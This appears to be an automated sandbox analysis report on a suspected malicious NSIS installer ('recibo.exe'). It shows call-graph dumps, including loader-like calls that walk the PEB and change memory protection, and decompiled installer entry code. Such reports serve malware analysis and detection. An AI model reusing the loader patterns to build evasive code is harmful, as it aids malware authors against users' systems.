20062 40689a 3 API calls 20055->20062 20061 40140b 2 API calls 20056->20061 20058 403e46 GetClassInfoW RegisterClassW 20057->20058 20059 403e5c DialogBoxParamW 20057->20059 
20058->20059 20063 40140b 2 API calls 20059->20063 20060->20034 20064 40140b 2 API calls 20060->20064 20061->20034 20062->20057 20063->20034 20064->20034 20065->19900 20066->19948 20067->19954 20068->19955 20069->19966 20071 403b2a 20070->20071 20072 403b1c CloseHandle 20070->20072 20108 403b57 20071->20108 20072->20071 20075 405c49 67 API calls 20076 403a5e OleUninitialize 20075->20076 20076->19921 20076->19922 20078 405bb2 20077->20078 20079 403a76 ExitProcess 20078->20079 20080 405bc6 MessageBoxIndirectW 20078->20080 20080->20079 20081->19983 20082->19985 20083->19989 20085 403022 20084->20085 20086 40303a 20084->20086 20087 403032 20085->20087 20088 40302b DestroyWindow 20085->20088 20089 403042 20086->20089 20090 40304a GetTickCount 20086->20090 20087->19992 20088->20087 20093 406946 2 API calls 20089->20093 20091 403058 CreateDialogParamW ShowWindow 20090->20091 20092 40307b 20090->20092 20091->20092 20092->19992 20094 403048 20093->20094 20094->19992 20095->19999 20096->19998 20098 403ed6 20097->20098 20107 406484 wsprintfW 20098->20107 20100 403f47 20101 403f7b 18 API calls 20100->20101 20103 403f4c 20101->20103 20102 403c77 20102->20022 20103->20102 20104 40657a 17 API calls 20103->20104 20104->20103 20105->20019 20106->20024 20107->20100 20109 403b65 20108->20109 20110 403b2f 20109->20110 20111 403b6a FreeLibrary GlobalFree 20109->20111 20110->20075 20111->20110 20111->20111 20167 402434 20168 402467 20167->20168 20169 40243c 20167->20169 20170 402da6 17 API calls 20168->20170 20171 402de6 17 API calls 20169->20171 20172 40246e 20170->20172 20173 402443 20171->20173 20179 402e64 20172->20179 20175 40244d 20173->20175 20178 40247b 20173->20178 20176 402da6 17 API calls 20175->20176 20177 402454 RegDeleteValueW RegCloseKey 20176->20177 20177->20178 20180 402e71 20179->20180 20181 402e78 20179->20181 20180->20178 20181->20180 20183 402ea9 20181->20183 20184 4063aa RegOpenKeyExW 20183->20184 20185 402ed7 20184->20185 20186 402ee1 20185->20186 20187 402f8c 
20185->20187 20188 402ee7 RegEnumValueW 20186->20188 20192 402f0a 20186->20192 20187->20180 20189 402f71 RegCloseKey 20188->20189 20188->20192 20189->20187 20190 402f46 RegEnumKeyW 20191 402f4f RegCloseKey 20190->20191 20190->20192 20193 40690a 5 API calls 20191->20193 20192->20189 20192->20190 20192->20191 20194 402ea9 6 API calls 20192->20194 20195 402f5f 20193->20195 20194->20192 20196 402f81 20195->20196 20197 402f63 RegDeleteKeyW 20195->20197 20196->20187 20197->20187 21113 40263e 21114 402652 21113->21114 21115 40266d 21113->21115 21116 402d84 17 API calls 21114->21116 21117 402672 21115->21117 21118 40269d 21115->21118 21125 402659 21116->21125 21120 402da6 17 API calls 21117->21120 21119 402da6 17 API calls 21118->21119 21122 4026a4 lstrlenW 21119->21122 21121 402679 21120->21121 21130 40655f WideCharToMultiByte 21121->21130 21122->21125 21124 40268d lstrlenA 21124->21125 21126 4026d1 21125->21126 21128 4026e7 21125->21128 21129 40610e 5 API calls 21125->21129 21127 4060df WriteFile 21126->21127 21126->21128 21127->21128 21129->21126 21130->21124 19189 4015c1 19190 402da6 17 API calls 19189->19190 19191 4015c8 19190->19191 19192 405eb7 4 API calls 19191->19192 19204 4015d1 19192->19204 19193 401631 19195 401636 19193->19195 19197 401663 19193->19197 19194 405e39 CharNextW 19194->19204 19216 401423 19195->19216 19199 401423 24 API calls 19197->19199 19206 40165b 19199->19206 19203 40164a SetCurrentDirectoryW 19203->19206 19204->19193 19204->19194 19205 401617 GetFileAttributesW 19204->19205 19208 405b08 19204->19208 19211 405a6e CreateDirectoryW 19204->19211 19220 405aeb CreateDirectoryW 19204->19220 19205->19204 19223 40690a GetModuleHandleA 19208->19223 19212 405abb 19211->19212 19213 405abf GetLastError 19211->19213 19212->19204 19213->19212 19214 405ace SetFileSecurityW 19213->19214 19214->19212 19215 405ae4 GetLastError 19214->19215 19215->19212 19217 40559f 24 API calls 19216->19217 19218 401431 19217->19218 19219 40653d lstrcpynW 19218->19219 
19219->19203 19221 405afb 19220->19221 19222 405aff GetLastError 19220->19222 19221->19204 19222->19221 19224 406930 GetProcAddress 19223->19224 19225 406926 19223->19225 19228 405b0f 19224->19228 19229 40689a GetSystemDirectoryW 19225->19229 19227 40692c 19227->19224 19227->19228 19228->19204 19230 4068bc wsprintfW LoadLibraryExW 19229->19230 19230->19227 19284 4014cb 19285 40559f 24 API calls 19284->19285 19286 4014d2 19285->19286 21150 4016cc 21151 402da6 17 API calls 21150->21151 21152 4016d2 GetFullPathNameW 21151->21152 21153 40170e 21152->21153 21156 4016ec 21152->21156 21154 401723 GetShortPathNameW 21153->21154 21155 402c2a 21153->21155 21154->21155 21156->21153 21157 406873 2 API calls 21156->21157 21158 4016fe 21157->21158 21158->21153 21160 40653d lstrcpynW 21158->21160 21160->21153 19299 4020d8 19300 4020ea 19299->19300 19310 40219c 19299->19310 19301 402da6 17 API calls 19300->19301 19302 4020f1 19301->19302 19304 402da6 17 API calls 19302->19304 19303 401423 24 API calls 19305 4022f6 19303->19305 19306 4020fa 19304->19306 19307 402110 LoadLibraryExW 19306->19307 19308 402102 GetModuleHandleW 19306->19308 19309 402121 19307->19309 19307->19310 19308->19307 19308->19309 19322 406979 19309->19322 19310->19303 19313 402132 19316 402151 19313->19316 19317 40213a 19313->19317 19314 40216b 19315 40559f 24 API calls 19314->19315 19318 402142 19315->19318 19327 71541817 19316->19327 19319 401423 24 API calls 19317->19319 19318->19305 19320 40218e FreeLibrary 19318->19320 19319->19318 19320->19305 19369 40655f WideCharToMultiByte 19322->19369 19324 406996 19325 40699d GetProcAddress 19324->19325 19326 40212c 19324->19326 19325->19326 19326->19313 19326->19314 19328 7154184a 19327->19328 19370 71541bff 19328->19370 19330 71541851 19331 71541976 19330->19331 19332 71541862 19330->19332 19333 71541869 19330->19333 19331->19318 19420 7154243e 19332->19420 19404 71542480 19333->19404 19338 715418cd 19342 715418d3 19338->19342 19343 7154191e 19338->19343 19339 
715418af 19433 71542655 19339->19433 19340 7154187f 19345 71541885 19340->19345 19351 71541890 19340->19351 19341 71541898 19352 7154188e 19341->19352 19430 71542e23 19341->19430 19452 71541666 19342->19452 19349 71542655 10 API calls 19343->19349 19345->19352 19414 71542b98 19345->19414 19355 7154190f 19349->19355 19350 715418b5 19444 71541654 19350->19444 19424 71542810 19351->19424 19352->19338 19352->19339 19361 71541965 19355->19361 19458 71542618 19355->19458 19358 71541896 19358->19352 19359 71542655 10 API calls 19359->19355 19361->19331 19363 7154196f GlobalFree 19361->19363 19363->19331 19366 71541951 19366->19361 19462 715415dd wsprintfW 19366->19462 19367 7154194a FreeLibrary 19367->19366 19369->19324 19465 715412bb GlobalAlloc 19370->19465 19372 71541c26 19466 715412bb GlobalAlloc 19372->19466 19374 71541e6b GlobalFree GlobalFree GlobalFree 19375 71541e88 19374->19375 19386 71541ed2 19374->19386 19376 7154227e 19375->19376 19384 71541e9d 19375->19384 19375->19386 19378 715422a0 GetModuleHandleW 19376->19378 19376->19386 19377 71541d26 GlobalAlloc 19396 71541c31 19377->19396 19380 715422c6 19378->19380 19381 715422b1 LoadLibraryW 19378->19381 19379 71541d8f GlobalFree 19379->19396 19473 715416bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 19380->19473 19381->19380 19381->19386 19382 71541d71 lstrcpyW 19383 71541d7b lstrcpyW 19382->19383 19383->19396 19384->19386 19469 715412cc 19384->19469 19386->19330 19387 71542318 19387->19386 19391 71542325 lstrlenW 19387->19391 19388 71542126 19472 715412bb GlobalAlloc 19388->19472 19474 715416bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 19391->19474 19392 71542067 GlobalFree 19392->19396 19393 715421ae 19393->19386 19401 71542216 lstrcpyW 19393->19401 19394 715422d8 19394->19387 19402 71542302 GetProcAddress 19394->19402 19396->19374 19396->19377 19396->19379 19396->19382 19396->19383 19396->19386 19396->19388 19396->19392 19396->19393 19397 
71541dcd 19396->19397 19399 715412cc 2 API calls 19396->19399 19397->19396 19467 7154162f GlobalSize GlobalAlloc 19397->19467 19398 7154233f 19398->19386 19399->19396 19401->19386 19402->19387 19403 7154212f 19403->19330 19411 71542498 19404->19411 19405 715412cc GlobalAlloc lstrcpynW 19405->19411 19407 715425c1 GlobalFree 19410 7154186f 19407->19410 19407->19411 19408 71542540 GlobalAlloc WideCharToMultiByte 19408->19407 19409 7154256b GlobalAlloc CLSIDFromString 19409->19407 19410->19340 19410->19341 19410->19352 19411->19405 19411->19407 19411->19408 19411->19409 19413 7154258a 19411->19413 19476 7154135a 19411->19476 19413->19407 19480 715427a4 19413->19480 19416 71542baa 19414->19416 19415 71542c4f CreateFileA 19419 71542c6d 19415->19419 19416->19415 19418 71542d39 19418->19352 19483 71542b42 19419->19483 19421 71542453 19420->19421 19422 7154245e GlobalAlloc 19421->19422 19423 71541868 19421->19423 19422->19421 19423->19333 19429 71542840 19424->19429 19425 715428ee 19427 715428f4 GlobalSize 19425->19427 19428 715428fe 19425->19428 19426 715428db GlobalAlloc 19426->19428 19427->19428 19428->19358 19429->19425 19429->19426 19432 71542e2e 19430->19432 19431 71542e6e GlobalFree 19432->19431 19487 715412bb GlobalAlloc 19433->19487 19435 715426d8 MultiByteToWideChar 19438 7154265f 19435->19438 19436 715426fa StringFromGUID2 19436->19438 19437 7154270b lstrcpynW 19437->19438 19438->19435 19438->19436 19438->19437 19439 7154271e wsprintfW 19438->19439 19440 71542742 GlobalFree 19438->19440 19441 71542777 GlobalFree 19438->19441 19442 71541312 2 API calls 19438->19442 19488 71541381 19438->19488 19439->19438 19440->19438 19441->19350 19442->19438 19492 715412bb GlobalAlloc 19444->19492 19446 71541659 19447 71541666 2 API calls 19446->19447 19448 71541663 19447->19448 19449 71541312 19448->19449 19450 71541355 GlobalFree 19449->19450 19451 7154131b GlobalAlloc lstrcpynW 19449->19451 19450->19355 19451->19450 19453 71541672 wsprintfW 19452->19453 19454 7154169f 
lstrcpyW 19452->19454 19457 715416b8 19453->19457 19454->19457 19457->19359 19459 71541931 19458->19459 19460 71542626 19458->19460 19459->19366 19459->19367 19460->19459 19461 71542642 GlobalFree 19460->19461 19461->19460 19463 71541312 2 API calls 19462->19463 19464 715415fe 19463->19464 19464->19361 19465->19372 19466->19396 19468 7154164d 19467->19468 19468->19397 19475 715412bb GlobalAlloc 19469->19475 19471 715412db lstrcpynW 19471->19386 19472->19403 19473->19394 19474->19398 19475->19471 19477 71541361 19476->19477 19478 715412cc 2 API calls 19477->19478 19479 7154137f 19478->19479 19479->19411 19481 715427b2 VirtualAlloc 19480->19481 19482 71542808 19480->19482 19481->19482 19482->19413 19484 71542b4d 19483->19484 19485 71542b52 GetLastError 19484->19485 19486 71542b5d 19484->19486 19485->19486 19486->19418 19487->19438 19489 715413ac 19488->19489 19490 7154138a 19488->19490 19489->19438 19490->19489 19491 71541390 lstrcpyW 19490->19491 19491->19489 19492->19446 19628 401ede 19629 402d84 17 API calls 19628->19629 19630 401ee4 19629->19630 19631 402d84 17 API calls 19630->19631 19632 401ef0 19631->19632 19633 401f07 EnableWindow 19632->19633 19634 401efc ShowWindow 19632->19634 19635 402c2a 19633->19635 19634->19635 19636 4056de 19637 405888 19636->19637 19638 4056ff GetDlgItem GetDlgItem GetDlgItem 19636->19638 19640 405891 GetDlgItem CreateThread CloseHandle 19637->19640 19641 4058b9 19637->19641 19682 4044ce SendMessageW 19638->19682 19640->19641 19685 405672 OleInitialize 19640->19685 19642 4058e4 19641->19642 19643 4058d0 ShowWindow ShowWindow 19641->19643 19644 405909 19641->19644 19645 4058f0 19642->19645 19646 405944 19642->19646 19684 4044ce SendMessageW 19643->19684 19651 404500 8 API calls 19644->19651 19649 4058f8 19645->19649 19650 40591e ShowWindow 19645->19650 19646->19644 19655 405952 SendMessageW 19646->19655 19647 40576f 19652 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 19647->19652 19656 404472 SendMessageW 
19649->19656 19658 405930 19650->19658 19659 40593e 19650->19659 19657 405917 19651->19657 19653 4057e4 19652->19653 19654 4057c8 SendMessageW SendMessageW 19652->19654 19660 4057f7 19653->19660 19661 4057e9 SendMessageW 19653->19661 19654->19653 19655->19657 19662 40596b CreatePopupMenu 19655->19662 19656->19644 19663 40559f 24 API calls 19658->19663 19664 404472 SendMessageW 19659->19664 19666 404499 18 API calls 19660->19666 19661->19660 19665 40657a 17 API calls 19662->19665 19663->19659 19664->19646 19667 40597b AppendMenuW 19665->19667 19668 405807 19666->19668 19669 405998 GetWindowRect 19667->19669 19670 4059ab TrackPopupMenu 19667->19670 19671 405810 ShowWindow 19668->19671 19672 405844 GetDlgItem SendMessageW 19668->19672 19669->19670 19670->19657 19673 4059c6 19670->19673 19674 405833 19671->19674 19675 405826 ShowWindow 19671->19675 19672->19657 19676 40586b SendMessageW SendMessageW 19672->19676 19677 4059e2 SendMessageW 19673->19677 19683 4044ce SendMessageW 19674->19683 19675->19674 19676->19657 19677->19677 19678 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 19677->19678 19680 405a24 SendMessageW 19678->19680 19680->19680 19681 405a4d GlobalUnlock SetClipboardData CloseClipboard 19680->19681 19681->19657 19682->19647 19683->19672 19684->19642 19686 4044e5 SendMessageW 19685->19686 19691 405695 19686->19691 19687 4056bc 19688 4044e5 SendMessageW 19687->19688 19689 4056ce OleUninitialize 19688->19689 19690 401389 2 API calls 19690->19691 19691->19687 19691->19690 19792 2cc5269 19793 2cc34f4 4 API calls 19792->19793 19794 2cc527a 19793->19794 19795 2cc34f4 4 API calls 19794->19795 19796 2cc5292 19795->19796 19797 2cc52a0 GetPEB 19796->19797 19798 2cc52ea 19797->19798 19799 2cc34f4 19798->19799 19802 2cc53be 19798->19802 19800 2cc35b9 19799->19800 19801 2cc3617 LoadLibraryA 19799->19801 19803 2cc3d6a 3 API calls 19800->19803 19805 2cc3654 3 API calls 19801->19805 19821 2cc61b4 19802->19821 19806 2cc35c8 19803->19806 19807 2cc3626 
19805->19807 19808 2cc3654 3 API calls 19806->19808 19809 2cc3610 19808->19809 19809->19801 19810 2cc5b8d 19814 2cc5f27 19810->19814 19818 2cc5c56 19810->19818 19811 2cc53c4 19811->19810 19815 2cc56fa 19811->19815 19817 2cb381c 19811->19817 19812 2cc61b4 NtProtectVirtualMemory 19813 2cc61ab 19812->19813 19814->19812 19814->19817 19816 2cc61b4 NtProtectVirtualMemory 19815->19816 19815->19817 19816->19817 19818->19817 19819 2cc61b4 NtProtectVirtualMemory 19818->19819 19820 2cc5f11 19819->19820 19822 2cc6238 NtProtectVirtualMemory 19821->19822 19822->19811 19854 4026ec 19855 402d84 17 API calls 19854->19855 19857 4026fb 19855->19857 19856 402745 ReadFile 19856->19857 19867 402838 19856->19867 19857->19856 19858 4060b0 ReadFile 19857->19858 19859 402785 MultiByteToWideChar 19857->19859 19860 40283a 19857->19860 19863 4027de 19857->19863 19864 4027ab SetFilePointer MultiByteToWideChar 19857->19864 19865 40284b 19857->19865 19857->19867 19858->19857 19859->19857 19877 406484 wsprintfW 19860->19877 19863->19857 19863->19867 19868 40610e SetFilePointer 19863->19868 19864->19857 19866 40286c SetFilePointer 19865->19866 19865->19867 19866->19867 19869 40612a 19868->19869 19872 406142 19868->19872 19870 4060b0 ReadFile 19869->19870 19871 406136 19870->19871 19871->19872 19873 406173 SetFilePointer 19871->19873 19874 40614b SetFilePointer 19871->19874 19872->19863 19873->19872 19874->19873 19875 406156 19874->19875 19876 4060df WriteFile 19875->19876 19876->19872 19877->19867 21174 2cb487e 21177 2cb4885 21174->21177 21175 2cb4875 21176 2cc37f4 3 API calls 21176->21177 21177->21175 21177->21176 21179 2cb4a0e 21177->21179 21178 2cc4e88 4 API calls 21180 2cc4e83 21178->21180 21179->21178 21182 2cb4a35 21179->21182 21181 2cc4e88 4 API calls 21180->21181 21181->21180 21474 401ff6 21475 402da6 17 API calls 21474->21475 21476 401ffd 21475->21476 21477 406873 2 API calls 21476->21477 21478 402003 21477->21478 21479 402014 21478->21479 21481 406484 wsprintfW 21478->21481 21481->21479 

Control-flow Graph (function starting at 40352d; nodes marked Executed / Not Executed)
                                                                                  C-Code - Quality: 79%
                                                                                  			_entry_() {
                                                                                  				WCHAR* _v8;
                                                                                  				signed int _v12;
                                                                                  				void* _v16;
                                                                                  				signed int _v20;
                                                                                  				int _v24;
                                                                                  				int _v28;
                                                                                  				struct _TOKEN_PRIVILEGES _v40;
                                                                                  				signed char _v42;
                                                                                  				int _v44;
                                                                                  				signed int _v48;
                                                                                  				intOrPtr _v278;
                                                                                  				signed short _v310;
                                                                                  				struct _OSVERSIONINFOW _v324;
                                                                                  				struct _SHFILEINFOW _v1016;
                                                                                  				intOrPtr* _t88;
                                                                                  				intOrPtr* _t94;
                                                                                  				void _t97;
                                                                                  				void* _t116;
                                                                                  				WCHAR* _t118;
                                                                                  				signed int _t120;
                                                                                  				intOrPtr* _t124;
                                                                                  				void* _t138;
                                                                                  				void* _t144;
                                                                                  				void* _t149;
                                                                                  				void* _t153;
                                                                                  				void* _t158;
                                                                                  				signed int _t168;
                                                                                  				void* _t171;
                                                                                  				void* _t176;
                                                                                  				intOrPtr _t178;
                                                                                  				intOrPtr _t179;
                                                                                  				intOrPtr* _t180;
                                                                                  				int _t189;
                                                                                  				void* _t190;
                                                                                  				void* _t199;
                                                                                  				signed int _t205;
                                                                                  				signed int _t210;
                                                                                  				signed int _t215;
                                                                                  				int* _t219;
                                                                                  				signed int _t227;
                                                                                  				signed int _t230;
                                                                                  				CHAR* _t232;
                                                                                  				signed int _t234;
                                                                                  				WCHAR* _t235;
                                                                                  
                                                                                  				0x440000 = 0x20;
                                                                                  				_t189 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                  				_v20 = 0;
                                                                                  				SetErrorMode(0x8001); // executed
                                                                                  				_v324.szCSDVersion = 0;
                                                                                  				_v48 = 0;
                                                                                  				_v44 = 0;
                                                                                  				_v324.dwOSVersionInfoSize = 0x11c;
                                                                                  				if(GetVersionExW( &_v324) == 0) {
                                                                                  					_v324.dwOSVersionInfoSize = 0x114;
                                                                                  					GetVersionExW( &_v324);
                                                                                  					asm("sbb eax, eax");
                                                                                  					_v42 = 4;
                                                                                  					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                                                                  				}
                                                                                  				if(_v324.dwMajorVersion < 0xa) {
                                                                                  					_v310 = _v310 & 0x00000000;
                                                                                  				}
                                                                                  				 *0x434fb8 = _v324.dwBuildNumber;
                                                                                  				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                                                                  				if( *0x434fbe != 0x600) {
                                                                                  					_t180 = E0040690A(_t189);
                                                                                  					if(_t180 != _t189) {
                                                                                  						 *_t180(0xc00);
                                                                                  					}
                                                                                  				}
                                                                                  				_t232 = "UXTHEME";
                                                                                  				do {
                                                                                  					E0040689A(_t232); // executed
                                                                                  					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                                                                  				} while ( *_t232 != 0);
                                                                                  				E0040690A(0xb);
                                                                                  				 *0x434f04 = E0040690A(9);
                                                                                  				_t88 = E0040690A(7);
                                                                                  				if(_t88 != _t189) {
                                                                                  					_t88 =  *_t88(0x1e);
                                                                                  					if(_t88 != 0) {
                                                                                  						 *0x434fbc =  *0x434fbc | 0x00000080;
                                                                                  					}
                                                                                  				}
                                                                                  				__imp__#17();
                                                                                  				__imp__OleInitialize(_t189); // executed
                                                                                  				 *0x434fc0 = _t88;
                                                                                  				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
                                                                                  				E0040653D(0x433f00, L"NSIS Error");
                                                                                  				E0040653D(0x440000, GetCommandLineW());
                                                                                  				_t94 = 0x440000;
                                                                                  				_t234 = 0x22;
                                                                                  				 *0x434f00 = 0x400000;
                                                                                  				if( *0x440000 == _t234) {
                                                                                  					_t94 = 0x440002;
                                                                                  				}
                                                                                  				_t199 = CharNextW(E00405E39(_t94, 0x440000));
                                                                                  				_v16 = _t199;
                                                                                  				while(1) {
                                                                                  					_t97 =  *_t199;
                                                                                  					_t252 = _t97 - _t189;
                                                                                  					if(_t97 == _t189) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_t210 = 0x20;
                                                                                  					__eflags = _t97 - _t210;
                                                                                  					if(_t97 != _t210) {
                                                                                  						L17:
                                                                                  						__eflags =  *_t199 - _t234;
                                                                                  						_v12 = _t210;
                                                                                  						if( *_t199 == _t234) {
                                                                                  							_v12 = _t234;
                                                                                  							_t199 = _t199 + 2;
                                                                                  							__eflags = _t199;
                                                                                  						}
                                                                                  						__eflags =  *_t199 - 0x2f;
                                                                                  						if( *_t199 != 0x2f) {
                                                                                  							L32:
                                                                                  							_t199 = E00405E39(_t199, _v12);
                                                                                  							__eflags =  *_t199 - _t234;
                                                                                  							if(__eflags == 0) {
                                                                                  								_t199 = _t199 + 2;
                                                                                  								__eflags = _t199;
                                                                                  							}
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							_t199 = _t199 + 2;
                                                                                  							__eflags =  *_t199 - 0x53;
                                                                                  							if( *_t199 != 0x53) {
                                                                                  								L24:
                                                                                  								asm("cdq");
                                                                                  								asm("cdq");
                                                                                  								_t215 = L"NCRC" & 0x0000ffff;
                                                                                  								asm("cdq");
                                                                                  								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                                                                  								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                                                                  								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                                                                  									L29:
                                                                                  									asm("cdq");
                                                                                  									asm("cdq");
                                                                                  									_t210 = L" /D=" & 0x0000ffff;
                                                                                  									asm("cdq");
                                                                                  									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                                                                  									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                                                                  									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                                                                  										L31:
                                                                                  										_t234 = 0x22;
                                                                                  										goto L32;
                                                                                  									}
                                                                                  									__eflags =  *_t199 - _t230;
                                                                                  									if( *_t199 == _t230) {
                                                                                  										 *(_t199 - 4) = _t189;
                                                                                  										__eflags = _t199;
                                                                                  										E0040653D(0x440800, _t199);
                                                                                  										L37:
                                                                                  										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                                  										GetTempPathW(0x400, _t235);
                                                                                  										_t116 = E004034FC(_t199, _t252);
                                                                                  										_t253 = _t116;
                                                                                  										if(_t116 != 0) {
                                                                                  											L40:
                                                                                  											DeleteFileW(L"1033"); // executed
                                                                                  											_t118 = E0040307D(_t255, _v20); // executed
                                                                                  											_v8 = _t118;
                                                                                  											if(_t118 != _t189) {
                                                                                  												L68:
                                                                                  												E00403B12();
                                                                                  												__imp__OleUninitialize();
                                                                                  												if(_v8 == _t189) {
                                                                                  													if( *0x434f94 == _t189) {
                                                                                  														L77:
                                                                                  														_t120 =  *0x434fac;
                                                                                  														if(_t120 != 0xffffffff) {
                                                                                  															_v24 = _t120;
                                                                                  														}
                                                                                  														ExitProcess(_v24);
                                                                                  													}
                                                                                  													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                                                                  														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                                                                  														_v40.PrivilegeCount = 1;
                                                                                  														_v28 = 2;
                                                                                  														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                                                                  													}
                                                                                  													_t124 = E0040690A(4);
                                                                                  													if(_t124 == _t189) {
                                                                                  														L75:
                                                                                  														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                                                                  															goto L77;
                                                                                  														}
                                                                                  														goto L76;
                                                                                  													} else {
                                                                                  														_push(0x80040002);
                                                                                  														_push(0x25);
                                                                                  														_push(_t189);
                                                                                  														_push(_t189);
                                                                                  														_push(_t189);
                                                                                  														if( *_t124() == 0) {
                                                                                  															L76:
                                                                                  															E0040140B(9);
                                                                                  															goto L77;
                                                                                  														}
                                                                                  														goto L75;
                                                                                  													}
                                                                                  												}
                                                                                  												E00405B9D(_v8, 0x200010);
                                                                                  												ExitProcess(2);
                                                                                  											}
                                                                                  											if( *0x434f1c == _t189) {
                                                                                  												L51:
                                                                                  												 *0x434fac =  *0x434fac | 0xffffffff;
                                                                                  												_v24 = E00403BEC(_t265);
                                                                                  												goto L68;
                                                                                  											}
                                                                                  											_t219 = E00405E39(0x440000, _t189);
                                                                                  											if(_t219 < 0x440000) {
                                                                                  												L48:
                                                                                  												_t264 = _t219 - 0x440000;
                                                                                  												_v8 = L"Error launching installer";
                                                                                  												if(_t219 < 0x440000) {
                                                                                  													_t190 = E00405B08(__eflags);
                                                                                  													lstrcatW(_t235, L"~nsu");
                                                                                  													__eflags = _t190;
                                                                                  													if(_t190 != 0) {
                                                                                  														lstrcatW(_t235, "A");
                                                                                  													}
                                                                                  													lstrcatW(_t235, L".tmp");
                                                                                  													_t138 = lstrcmpiW(_t235, 0x441800);
                                                                                  													__eflags = _t138;
                                                                                  													if(_t138 == 0) {
                                                                                  														L67:
                                                                                  														_t189 = 0;
                                                                                  														__eflags = 0;
                                                                                  														goto L68;
                                                                                  													} else {
                                                                                  														__eflags = _t190;
                                                                                  														_push(_t235);
                                                                                  														if(_t190 == 0) {
                                                                                  															E00405AEB();
                                                                                  														} else {
                                                                                  															E00405A6E();
                                                                                  														}
                                                                                  														SetCurrentDirectoryW(_t235);
                                                                                  														__eflags =  *0x440800;
                                                                                  														if( *0x440800 == 0) {
                                                                                  															E0040653D(0x440800, 0x441800);
                                                                                  														}
                                                                                  														E0040653D(0x436000, _v16);
                                                                                  														_t202 = "A" & 0x0000ffff;
                                                                                  														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                  														__eflags = _t144;
                                                                                  														_v12 = 0x1a;
                                                                                  														 *0x436800 = _t144;
                                                                                  														do {
                                                                                  															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                                                                  															DeleteFileW(0x42aa28);
                                                                                  															__eflags = _v8;
                                                                                  															if(_v8 != 0) {
                                                                                  																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\recibo.exe", 0x42aa28, 1);
                                                                                  																__eflags = _t149;
                                                                                  																if(_t149 != 0) {
                                                                                  																	E004062FD(_t202, 0x42aa28, 0);
                                                                                  																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                                                                  																	_t153 = E00405B20(0x42aa28);
                                                                                  																	__eflags = _t153;
                                                                                  																	if(_t153 != 0) {
                                                                                  																		CloseHandle(_t153);
                                                                                  																		_v8 = 0;
                                                                                  																	}
                                                                                  																}
                                                                                  															}
                                                                                  															 *0x436800 =  *0x436800 + 1;
                                                                                  															_t61 =  &_v12;
                                                                                  															 *_t61 = _v12 - 1;
                                                                                  															__eflags =  *_t61;
                                                                                  														} while ( *_t61 != 0);
                                                                                  														E004062FD(_t202, _t235, 0);
                                                                                  														goto L67;
                                                                                  													}
                                                                                  												}
                                                                                  												 *_t219 = _t189;
                                                                                  												_t222 =  &(_t219[2]);
                                                                                  												_t158 = E00405F14(_t264,  &(_t219[2]));
                                                                                  												_t265 = _t158;
                                                                                  												if(_t158 == 0) {
                                                                                  													goto L68;
                                                                                  												}
                                                                                  												E0040653D(0x440800, _t222);
                                                                                  												E0040653D(0x441000, _t222);
                                                                                  												_v8 = _t189;
                                                                                  												goto L51;
                                                                                  											}
                                                                                  											asm("cdq");
                                                                                  											asm("cdq");
                                                                                  											asm("cdq");
                                                                                  											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                  											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                                                  											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                                                  												_t219 = _t219;
                                                                                  												if(_t219 >= 0x440000) {
                                                                                  													continue;
                                                                                  												}
                                                                                  												break;
                                                                                  											}
                                                                                  											_t189 = 0;
                                                                                  											goto L48;
                                                                                  										}
                                                                                  										GetWindowsDirectoryW(_t235, 0x3fb);
                                                                                  										lstrcatW(_t235, L"\\Temp");
                                                                                  										_t171 = E004034FC(_t199, _t253);
                                                                                  										_t254 = _t171;
                                                                                  										if(_t171 != 0) {
                                                                                  											goto L40;
                                                                                  										}
                                                                                  										GetTempPathW(0x3fc, _t235);
                                                                                  										lstrcatW(_t235, L"Low");
                                                                                  										SetEnvironmentVariableW(L"TEMP", _t235);
                                                                                  										SetEnvironmentVariableW(L"TMP", _t235);
                                                                                  										_t176 = E004034FC(_t199, _t254);
                                                                                  										_t255 = _t176;
                                                                                  										if(_t176 == 0) {
                                                                                  											goto L68;
                                                                                  										}
                                                                                  										goto L40;
                                                                                  									}
                                                                                  									goto L31;
                                                                                  								}
